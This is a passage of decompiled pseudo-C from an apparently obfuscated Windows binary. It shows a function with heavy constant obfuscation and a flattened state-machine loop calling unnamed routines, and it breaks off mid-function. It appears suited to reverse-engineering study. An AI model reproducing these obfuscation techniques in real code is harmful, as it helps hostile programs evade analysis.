                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				signed int _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				signed int _v176;
                                                                                                                                                                                                                    				signed int _v180;
                                                                                                                                                                                                                    				signed int _v184;
                                                                                                                                                                                                                    				signed int _v188;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				signed int _v196;
                                                                                                                                                                                                                    				signed int _v200;
                                                                                                                                                                                                                    				signed int _v204;
                                                                                                                                                                                                                    				signed int _v208;
                                                                                                                                                                                                                    				signed int _v212;
                                                                                                                                                                                                                    				signed int _v216;
                                                                                                                                                                                                                    				signed int _v220;
                                                                                                                                                                                                                    				signed int _v224;
                                                                                                                                                                                                                    				signed int _v228;
                                                                                                                                                                                                                    				signed int _v232;
                                                                                                                                                                                                                    				signed int _v236;
                                                                                                                                                                                                                    				signed int _v240;
                                                                                                                                                                                                                    				signed int _v244;
                                                                                                                                                                                                                    				signed int _v248;
                                                                                                                                                                                                                    				signed int _v252;
                                                                                                                                                                                                                    				signed int _v256;
                                                                                                                                                                                                                    				signed int _v260;
                                                                                                                                                                                                                    				signed int _v264;
                                                                                                                                                                                                                    				signed int _v268;
                                                                                                                                                                                                                    				signed int _v272;
                                                                                                                                                                                                                    				signed int _v276;
                                                                                                                                                                                                                    				signed int _v280;
                                                                                                                                                                                                                    				signed int _v284;
                                                                                                                                                                                                                    				signed int _t735;
                                                                                                                                                                                                                    				void* _t737;
                                                                                                                                                                                                                    				signed int _t738;
                                                                                                                                                                                                                    				signed int _t743;
                                                                                                                                                                                                                    				intOrPtr _t751;
                                                                                                                                                                                                                    				signed int _t752;
                                                                                                                                                                                                                    				signed int _t764;
                                                                                                                                                                                                                    				signed int* _t766;
                                                                                                                                                                                                                    				signed int _t769;
                                                                                                                                                                                                                    				signed int _t786;
                                                                                                                                                                                                                    				void* _t823;
                                                                                                                                                                                                                    				signed int _t841;
                                                                                                                                                                                                                    				signed int _t842;
                                                                                                                                                                                                                    				signed int _t843;
                                                                                                                                                                                                                    				signed int _t844;
                                                                                                                                                                                                                    				signed int _t845;
                                                                                                                                                                                                                    				signed int _t846;
                                                                                                                                                                                                                    				signed int _t847;
                                                                                                                                                                                                                    				signed int _t848;
                                                                                                                                                                                                                    				signed int _t849;
                                                                                                                                                                                                                    				signed int _t850;
                                                                                                                                                                                                                    				signed int _t851;
                                                                                                                                                                                                                    				signed int _t852;
                                                                                                                                                                                                                    				signed int _t853;
                                                                                                                                                                                                                    				signed int _t854;
                                                                                                                                                                                                                    				signed int _t856;
                                                                                                                                                                                                                    				signed int _t858;
                                                                                                                                                                                                                    				signed int* _t865;
                                                                                                                                                                                                                    				void* _t867;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a40);
                                                                                                                                                                                                                    				_push(_a36);
                                                                                                                                                                                                                    				_t766 = _a24;
                                                                                                                                                                                                                    				_push(_a32);
                                                                                                                                                                                                                    				_push(_a28);
                                                                                                                                                                                                                    				_v20 = __ecx;
                                                                                                                                                                                                                    				_push(_t766);
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4 & 0x0000ffff);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_a4 & 0x0000ffff);
                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                    				_t865 =  &(( &_v284)[0xc]);
                                                                                                                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                                                                                                                    				_v16 = 0x30d838;
                                                                                                                                                                                                                    				_t764 = 0;
                                                                                                                                                                                                                    				_v12 = 0xa07ac6;
                                                                                                                                                                                                                    				_t856 = 0xd6a7ab2;
                                                                                                                                                                                                                    				_v276 = 0xbe398e;
                                                                                                                                                                                                                    				_v276 = _v276 + 0xffff084b;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0x00bd41d9;
                                                                                                                                                                                                                    				_v196 = 0xfe8062;
                                                                                                                                                                                                                    				_v196 = _v196 << 0xa;
                                                                                                                                                                                                                    				_v196 = _v196 << 0xa;
                                                                                                                                                                                                                    				_v196 = _v196 ^ 0x06200013;
                                                                                                                                                                                                                    				_v104 = 0xf5bc18;
                                                                                                                                                                                                                    				_t841 = 0x25;
                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                    				_v104 = _v104 / _t841;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x0006a4f0;
                                                                                                                                                                                                                    				_v188 = 0x516f2a;
                                                                                                                                                                                                                    				_v188 = _v188 >> 0xb;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0x1f309afa;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0x1f3010d7;
                                                                                                                                                                                                                    				_v268 = 0x8af3ab;
                                                                                                                                                                                                                    				_v268 = _v268 ^ 0x08681fdf;
                                                                                                                                                                                                                    				_t842 = 0x7b;
                                                                                                                                                                                                                    				_v268 = _v268 * 0x11;
                                                                                                                                                                                                                    				_v268 = _v268 ^ 0xe293dba6;
                                                                                                                                                                                                                    				_v268 = _v268 ^ 0x75822812;
                                                                                                                                                                                                                    				_v200 = 0xfe0522;
                                                                                                                                                                                                                    				_v200 = _v200 << 7;
                                                                                                                                                                                                                    				_v200 = _v200 >> 6;
                                                                                                                                                                                                                    				_v200 = _v200 ^ 0x01bc0a44;
                                                                                                                                                                                                                    				_v152 = 0x6eb541;
                                                                                                                                                                                                                    				_v152 = _v152 << 7;
                                                                                                                                                                                                                    				_v152 = _v152 | 0x373096da;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0x377eb6da;
                                                                                                                                                                                                                    				_v224 = 0x809cbe;
                                                                                                                                                                                                                    				_v224 = _v224 ^ 0x9f04362e;
                                                                                                                                                                                                                    				_v224 = _v224 / _t842;
                                                                                                                                                                                                                    				_v224 = _v224 | 0x058fc739;
                                                                                                                                                                                                                    				_v224 = _v224 ^ 0x01cfc77b;
                                                                                                                                                                                                                    				_v120 = 0x3a5760;
                                                                                                                                                                                                                    				_v120 = _v120 + 0x9449;
                                                                                                                                                                                                                    				_v120 = _v120 << 4;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x03a6ba90;
                                                                                                                                                                                                                    				_v248 = 0xf48cad;
                                                                                                                                                                                                                    				_v248 = _v248 + 0xffff9db8;
                                                                                                                                                                                                                    				_v248 = _v248 << 4;
                                                                                                                                                                                                                    				_v248 = _v248 >> 1;
                                                                                                                                                                                                                    				_v248 = _v248 ^ 0x07a15128;
                                                                                                                                                                                                                    				_v216 = 0x25dd54;
                                                                                                                                                                                                                    				_v216 = _v216 >> 6;
                                                                                                                                                                                                                    				_v216 = _v216 + 0x2a77;
                                                                                                                                                                                                                    				_v216 = _v216 + 0xba9d;
                                                                                                                                                                                                                    				_v216 = _v216 ^ 0x00017d89;
                                                                                                                                                                                                                    				_v60 = 0x4148ce;
                                                                                                                                                                                                                    				_v60 = _v60 + 0xffff1a3b;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x80406309;
                                                                                                                                                                                                                    				_v192 = 0x1dd7c0;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0x6fc25a9a;
                                                                                                                                                                                                                    				_t843 = 0x5f;
                                                                                                                                                                                                                    				_v192 = _v192 * 0x7a;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0x50895ce4;
                                                                                                                                                                                                                    				_v252 = 0x9ab5e1;
                                                                                                                                                                                                                    				_v252 = _v252 / _t843;
                                                                                                                                                                                                                    				_v252 = _v252 + 0x394f;
                                                                                                                                                                                                                    				_v252 = _v252 + 0x318e;
                                                                                                                                                                                                                    				_v252 = _v252 ^ 0x00020b85;
                                                                                                                                                                                                                    				_v140 = 0x2e06b2;
                                                                                                                                                                                                                    				_v140 = _v140 << 2;
                                                                                                                                                                                                                    				_v140 = _v140 + 0xffff9927;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x00b7b3f0;
                                                                                                                                                                                                                    				_v124 = 0xb3e581;
                                                                                                                                                                                                                    				_v124 = _v124 << 9;
                                                                                                                                                                                                                    				_t844 = 0x6d;
                                                                                                                                                                                                                    				_v124 = _v124 / _t844;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x00f3c552;
                                                                                                                                                                                                                    				_v76 = 0x8274bc;
                                                                                                                                                                                                                    				_v76 = _v76 >> 0xf;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x00000107;
                                                                                                                                                                                                                    				_v132 = 0x628917;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0xf95694dc;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x8f8499d6;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x76b0851d;
                                                                                                                                                                                                                    				_v284 = 0x4903da;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0xde87afa5;
                                                                                                                                                                                                                    				_v284 = _v284 >> 0xb;
                                                                                                                                                                                                                    				_v284 = _v284 >> 0xc;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0x000dd986;
                                                                                                                                                                                                                    				_v280 = 0x515c74;
                                                                                                                                                                                                                    				_v280 = _v280 * 0x19;
                                                                                                                                                                                                                    				_v280 = _v280 * 0x2d;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x658cc7bb;
                                                                                                                                                                                                                    				_v280 = 0x1ad2e6;
                                                                                                                                                                                                                    				_v280 = _v280 + 0xffff9096;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x5e10d4dd;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x5e002aff;
                                                                                                                                                                                                                    				_v276 = 0x871130;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0x3860028f;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0x38e02ada;
                                                                                                                                                                                                                    				_v280 = 0x818cd2;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0xab51d1f7;
                                                                                                                                                                                                                    				_v280 = _v280 * 0x69;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x78753441;
                                                                                                                                                                                                                    				_v280 = 0x48f538;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x411942ed;
                                                                                                                                                                                                                    				_v280 = _v280 + 0x87c;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x415891b7;
                                                                                                                                                                                                                    				_v284 = 0xeb44f9;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0xa6b5219c;
                                                                                                                                                                                                                    				_v284 = _v284 >> 0xc;
                                                                                                                                                                                                                    				_v284 = _v284 | 0xc3f82a88;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0xc3f64e9a;
                                                                                                                                                                                                                    				_v284 = 0x609552;
                                                                                                                                                                                                                    				_v284 = _v284 + 0x6880;
                                                                                                                                                                                                                    				_v284 = _v284 * 0x26;
                                                                                                                                                                                                                    				_v284 = _v284 << 6;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0x99648695;
                                                                                                                                                                                                                    				_v276 = 0x9eee2f;
                                                                                                                                                                                                                    				_v276 = _v276 + 0x2db6;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0x00934f4c;
                                                                                                                                                                                                                    				_v284 = 0xb9db3a;
                                                                                                                                                                                                                    				_v284 = _v284 | 0xc60a9169;
                                                                                                                                                                                                                    				_v284 = _v284 << 2;
                                                                                                                                                                                                                    				_t845 = 0x2a;
                                                                                                                                                                                                                    				_v284 = _v284 / _t845;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0x00a50352;
                                                                                                                                                                                                                    				_v280 = 0xa52adc;
                                                                                                                                                                                                                    				_v280 = _v280 + 0xffffbf33;
                                                                                                                                                                                                                    				_v280 = _v280 + 0x4b69;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x00af76fd;
                                                                                                                                                                                                                    				_v240 = 0x1db970;
                                                                                                                                                                                                                    				_t846 = 0x3c;
                                                                                                                                                                                                                    				_v240 = _v240 * 0x30;
                                                                                                                                                                                                                    				_v240 = _v240 << 0xe;
                                                                                                                                                                                                                    				_v240 = _v240 + 0xffffa717;
                                                                                                                                                                                                                    				_v240 = _v240 ^ 0xb13ee2d6;
                                                                                                                                                                                                                    				_v116 = 0xaa5d3e;
                                                                                                                                                                                                                    				_v116 = _v116 + 0xffff66f2;
                                                                                                                                                                                                                    				_v116 = _v116 >> 0xb;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x00011ba0;
                                                                                                                                                                                                                    				_v36 = 0xf7588;
                                                                                                                                                                                                                    				_v36 = _v36 >> 2;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x0002f5a5;
                                                                                                                                                                                                                    				_v56 = 0xc9af56;
                                                                                                                                                                                                                    				_v56 = _v56 << 2;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x0325b26a;
                                                                                                                                                                                                                    				_v212 = 0x710ac5;
                                                                                                                                                                                                                    				_v212 = _v212 * 0x23;
                                                                                                                                                                                                                    				_v212 = _v212 << 8;
                                                                                                                                                                                                                    				_v212 = _v212 << 0xb;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0xc773c12b;
                                                                                                                                                                                                                    				_v108 = 0xa317b0;
                                                                                                                                                                                                                    				_v108 = _v108 + 0xffff7be6;
                                                                                                                                                                                                                    				_v108 = _v108 >> 0xe;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x00018d4f;
                                                                                                                                                                                                                    				_v220 = 0x1dc23e;
                                                                                                                                                                                                                    				_v220 = _v220 * 0x65;
                                                                                                                                                                                                                    				_v220 = _v220 << 5;
                                                                                                                                                                                                                    				_v220 = _v220 / _t846;
                                                                                                                                                                                                                    				_v220 = _v220 ^ 0x01f2a30f;
                                                                                                                                                                                                                    				_v92 = 0x62c4aa;
                                                                                                                                                                                                                    				_t847 = 0x1c;
                                                                                                                                                                                                                    				_v92 = _v92 / _t847;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x000bcbbd;
                                                                                                                                                                                                                    				_v44 = 0xf3b316;
                                                                                                                                                                                                                    				_t848 = 0x21;
                                                                                                                                                                                                                    				_v44 = _v44 * 0x6d;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x67c716cf;
                                                                                                                                                                                                                    				_v256 = 0x266f72;
                                                                                                                                                                                                                    				_t318 =  &_v256; // 0x266f72
                                                                                                                                                                                                                    				_v256 =  *_t318;
                                                                                                                                                                                                                    				_t320 =  &_v256; // 0x266f72
                                                                                                                                                                                                                    				_v256 =  *_t320 / _t848;
                                                                                                                                                                                                                    				_v256 = _v256 + 0xffff71f7;
                                                                                                                                                                                                                    				_v256 = _v256 ^ 0x000f3202;
                                                                                                                                                                                                                    				_v232 = 0xa6e082;
                                                                                                                                                                                                                    				_t849 = 0x15;
                                                                                                                                                                                                                    				_v232 = _v232 / _t849;
                                                                                                                                                                                                                    				_v232 = _v232 + 0xffffd82a;
                                                                                                                                                                                                                    				_v232 = _v232 + 0x7fa5;
                                                                                                                                                                                                                    				_v232 = _v232 ^ 0x000df32a;
                                                                                                                                                                                                                    				_v176 = 0x48b332;
                                                                                                                                                                                                                    				_v176 = _v176 ^ 0xbe7ca9d8;
                                                                                                                                                                                                                    				_v176 = _v176 | 0xa27b2d31;
                                                                                                                                                                                                                    				_v176 = _v176 ^ 0xbe7e51c3;
                                                                                                                                                                                                                    				_v144 = 0xeaf78d;
                                                                                                                                                                                                                    				_v144 = _v144 >> 9;
                                                                                                                                                                                                                    				_t850 = 0x74;
                                                                                                                                                                                                                    				_v144 = _v144 * 0x51;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x002ded5e;
                                                                                                                                                                                                                    				_v32 = 0x88033f;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x787f;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x008e8338;
                                                                                                                                                                                                                    				_v160 = 0xf3868c;
                                                                                                                                                                                                                    				_v160 = _v160 << 4;
                                                                                                                                                                                                                    				_v160 = _v160 >> 9;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x0003e54f;
                                                                                                                                                                                                                    				_v136 = 0xe4c250;
                                                                                                                                                                                                                    				_v136 = _v136 / _t850;
                                                                                                                                                                                                                    				_t851 = 0x27;
                                                                                                                                                                                                                    				_v136 = _v136 / _t851;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x0009b8e4;
                                                                                                                                                                                                                    				_v168 = 0x9959f6;
                                                                                                                                                                                                                    				_v168 = _v168 | 0xfdaeeed7;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0xfdb87e57;
                                                                                                                                                                                                                    				_v100 = 0x8c38ce;
                                                                                                                                                                                                                    				_v100 = _v100 + 0xffff1f4e;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x008614a9;
                                                                                                                                                                                                                    				_v264 = 0xe4cfe7;
                                                                                                                                                                                                                    				_v264 = _v264 << 9;
                                                                                                                                                                                                                    				_v264 = _v264 ^ 0x73194a8f;
                                                                                                                                                                                                                    				_v264 = _v264 >> 4;
                                                                                                                                                                                                                    				_v264 = _v264 ^ 0x0ba2c7d9;
                                                                                                                                                                                                                    				_v172 = 0x91edb0;
                                                                                                                                                                                                                    				_t852 = 0x68;
                                                                                                                                                                                                                    				_v172 = _v172 / _t852;
                                                                                                                                                                                                                    				_v172 = _v172 << 0xb;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0x0b333bfc;
                                                                                                                                                                                                                    				_v180 = 0x7791cc;
                                                                                                                                                                                                                    				_v180 = _v180 + 0xffff2592;
                                                                                                                                                                                                                    				_v180 = _v180 + 0xffff843c;
                                                                                                                                                                                                                    				_v180 = _v180 ^ 0x0079f653;
                                                                                                                                                                                                                    				_v208 = 0xa886f;
                                                                                                                                                                                                                    				_v208 = _v208 + 0xffff840c;
                                                                                                                                                                                                                    				_v208 = _v208 * 0x27;
                                                                                                                                                                                                                    				_v208 = _v208 + 0xffff3a8c;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0x018cb138;
                                                                                                                                                                                                                    				_v156 = 0x62d572;
                                                                                                                                                                                                                    				_v156 = _v156 + 0x2d86;
                                                                                                                                                                                                                    				_v156 = _v156 + 0x532d;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x006b70ad;
                                                                                                                                                                                                                    				_v164 = 0xec25f6;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x5d61b129;
                                                                                                                                                                                                                    				_v164 = _v164 * 0x1d;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x990a8fdd;
                                                                                                                                                                                                                    				_v96 = 0x3f638a;
                                                                                                                                                                                                                    				_v96 = _v96 + 0xdc94;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x0040d13c;
                                                                                                                                                                                                                    				_v260 = 0x9e234e;
                                                                                                                                                                                                                    				_v260 = _v260 << 0xf;
                                                                                                                                                                                                                    				_v260 = _v260 + 0xffff0cbd;
                                                                                                                                                                                                                    				_v260 = _v260 >> 3;
                                                                                                                                                                                                                    				_v260 = _v260 ^ 0x02306e06;
                                                                                                                                                                                                                    				_v80 = 0x6e841c;
                                                                                                                                                                                                                    				_v80 = _v80 >> 6;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x0004493e;
                                                                                                                                                                                                                    				_v88 = 0x7069b1;
                                                                                                                                                                                                                    				_v88 = _v88 >> 0xc;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x000ee886;
                                                                                                                                                                                                                    				_v72 = 0x24609f;
                                                                                                                                                                                                                    				_t853 = 0xb;
                                                                                                                                                                                                                    				_v72 = _v72 / _t853;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x00096e5a;
                                                                                                                                                                                                                    				_v236 = 0x58bed4;
                                                                                                                                                                                                                    				_v236 = _v236 << 0xe;
                                                                                                                                                                                                                    				_v236 = _v236 + 0x90f8;
                                                                                                                                                                                                                    				_v236 = _v236 ^ 0x5c98e0ce;
                                                                                                                                                                                                                    				_v236 = _v236 ^ 0x732af7ce;
                                                                                                                                                                                                                    				_v244 = 0x65b2e;
                                                                                                                                                                                                                    				_v244 = _v244 * 0x69;
                                                                                                                                                                                                                    				_v244 = _v244 >> 0xb;
                                                                                                                                                                                                                    				_v244 = _v244 << 2;
                                                                                                                                                                                                                    				_v244 = _v244 ^ 0x00030050;
                                                                                                                                                                                                                    				_v148 = 0xc5243b;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0x9462b2ce;
                                                                                                                                                                                                                    				_v148 = _v148 + 0xffffd352;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0x94a943fe;
                                                                                                                                                                                                                    				_v276 = 0xa020ae;
                                                                                                                                                                                                                    				_v276 = _v276 >> 9;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0x00057a29;
                                                                                                                                                                                                                    				_v64 = 0xf3742f;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0xbc21ff2b;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0xbcd7525d;
                                                                                                                                                                                                                    				_v228 = 0x1f4ad2;
                                                                                                                                                                                                                    				_v228 = _v228 + 0xffffdbca;
                                                                                                                                                                                                                    				_v228 = _v228 ^ 0xd3cf2eaf;
                                                                                                                                                                                                                    				_v228 = _v228 * 0x65;
                                                                                                                                                                                                                    				_v228 = _v228 ^ 0x911ccbed;
                                                                                                                                                                                                                    				_v40 = 0xe03e5e;
                                                                                                                                                                                                                    				_t522 =  &_v40; // 0xe03e5e
                                                                                                                                                                                                                    				_v40 =  *_t522 * 0x71;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x62ff84bd;
                                                                                                                                                                                                                    				_v84 = 0x27f9e;
                                                                                                                                                                                                                    				_v84 = _v84 | 0x50984895;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x509b44dc;
                                                                                                                                                                                                                    				_v204 = 0x415821;
                                                                                                                                                                                                                    				_v204 = _v204 >> 1;
                                                                                                                                                                                                                    				_v204 = _v204 * 0x47;
                                                                                                                                                                                                                    				_v204 = _v204 * 0x55;
                                                                                                                                                                                                                    				_v204 = _v204 ^ 0x023dda0a;
                                                                                                                                                                                                                    				_v184 = 0x62165e;
                                                                                                                                                                                                                    				_v184 = _v184 + 0xffffdfe6;
                                                                                                                                                                                                                    				_v184 = _v184 >> 7;
                                                                                                                                                                                                                    				_v184 = _v184 ^ 0x000e523b;
                                                                                                                                                                                                                    				_v112 = 0xb5d3e0;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0xbd686d30;
                                                                                                                                                                                                                    				_v112 = _v112 << 6;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x77654247;
                                                                                                                                                                                                                    				_v68 = 0x946815;
                                                                                                                                                                                                                    				_v68 = _v68 | 0x93e95f21;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x93fe5b24;
                                                                                                                                                                                                                    				_v128 = 0x7ebe6e;
                                                                                                                                                                                                                    				_v128 = _v128 * 0x1e;
                                                                                                                                                                                                                    				_v128 = _v128 | 0xbfc457ab;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0xbfdac2df;
                                                                                                                                                                                                                    				_v52 = 0xe511d0;
                                                                                                                                                                                                                    				_v52 = _v52 << 0xf;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x88e43d96;
                                                                                                                                                                                                                    				_v284 = 0xbf4c63;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0xd894bfb5;
                                                                                                                                                                                                                    				_v284 = _v284 + 0x9a59;
                                                                                                                                                                                                                    				_t854 = 0x73;
                                                                                                                                                                                                                    				_v284 = _v284 / _t854;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0x01ecb4af;
                                                                                                                                                                                                                    				_v280 = 0x3ef4d8;
                                                                                                                                                                                                                    				_v280 = _v280 << 9;
                                                                                                                                                                                                                    				_v280 = _v280 + 0xffff2cb8;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x7dec70ff;
                                                                                                                                                                                                                    				_t863 = _v24;
                                                                                                                                                                                                                    				_t855 = _v24;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t823 = 0xaaaef06;
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						_t867 = _t856 - _t823;
                                                                                                                                                                                                                    						if(_t867 <= 0) {
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                    						if(_t867 == 0) {
                                                                                                                                                                                                                    							_t735 = E00A7A47E(_t766, _v44, _v256, _a40, _v232, _t863, _t766, _v176, _t766, _v144, _t766, _v76, _a4);
                                                                                                                                                                                                                    							_t865 =  &(_t865[0xb]);
                                                                                                                                                                                                                    							_v272 = _t735;
                                                                                                                                                                                                                    							__eflags = _t735;
                                                                                                                                                                                                                    							_t856 =  !=  ? 0xe73aa5d : 0xdf2930f;
                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t856 == 0x227574d) {
                                                                                                                                                                                                                    								__eflags = E00A6B354(_t855, _a20);
                                                                                                                                                                                                                    								_t856 = 0xfe05c1f;
                                                                                                                                                                                                                    								_t737 = 1;
                                                                                                                                                                                                                    								_t764 =  !=  ? _t737 : _t764;
                                                                                                                                                                                                                    								goto L10;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t856 == 0x4c06b12) {
                                                                                                                                                                                                                    									_t769 =  *_t766;
                                                                                                                                                                                                                    									__eflags = _t769;
                                                                                                                                                                                                                    									if(_t769 == 0) {
                                                                                                                                                                                                                    										_t738 = 0;
                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_t738 = _a24[1];
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									E00A70461(_t769, _v40, _t855, _t769, _a12, _v84, _v204, _t738, _v184);
                                                                                                                                                                                                                    									_t865 =  &(_t865[7]);
                                                                                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                                                                                    									_t856 = (_t856 & 0xf9549d0a) + 0xfe05c1f;
                                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t856 == 0x658e3dc) {
                                                                                                                                                                                                                    										E00A618B0(_t735, _v128, _v52);
                                                                                                                                                                                                                    										_t856 = 0xdf2930f;
                                                                                                                                                                                                                    										goto L10;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t856 == 0x8cffe47) {
                                                                                                                                                                                                                    											_push(_t766);
                                                                                                                                                                                                                    											_push(_t766);
                                                                                                                                                                                                                    											_t743 = E00A62A6F(_v192, _v240, _v116, _v36, _t766, _t766, _v56);
                                                                                                                                                                                                                    											_t863 = _t743;
                                                                                                                                                                                                                    											__eflags = _t743;
                                                                                                                                                                                                                    											_t856 =  !=  ? 0xaaaef06 : 0xba9d080;
                                                                                                                                                                                                                    											E00A76A6B(0, _v212, _v108, _v220, _v92);
                                                                                                                                                                                                                    											_t766 = _a24;
                                                                                                                                                                                                                    											_t865 =  &(_t865[0xa]);
                                                                                                                                                                                                                    											_t823 = 0xaaaef06;
                                                                                                                                                                                                                    											goto L38;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_t872 = _t856 - 0x934f929;
                                                                                                                                                                                                                    											if(_t856 != 0x934f929) {
                                                                                                                                                                                                                    												L38:
                                                                                                                                                                                                                    												__eflags = _t856 - 0xba9d080;
                                                                                                                                                                                                                    												if(__eflags != 0) {
                                                                                                                                                                                                                    													while(1) {
                                                                                                                                                                                                                    														_t867 = _t856 - _t823;
                                                                                                                                                                                                                    														if(_t867 <= 0) {
                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                    														goto L20;
                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                    													goto L3;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												E00A7A185(_t855, _v196, _t872);
                                                                                                                                                                                                                    												_t856 =  ==  ? 0x227574d : 0xfe05c1f;
                                                                                                                                                                                                                    												L10:
                                                                                                                                                                                                                    												_t735 = _v272;
                                                                                                                                                                                                                    												L11:
                                                                                                                                                                                                                    												_t766 = _a24;
                                                                                                                                                                                                                    												goto L1;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L41:
                                                                                                                                                                                                                    						return _t764;
                                                                                                                                                                                                                    						L20:
                                                                                                                                                                                                                    						__eflags = _t856 - 0xb5f9057;
                                                                                                                                                                                                                    						if(_t856 == 0xb5f9057) {
                                                                                                                                                                                                                    							_t856 = 0x8cffe47;
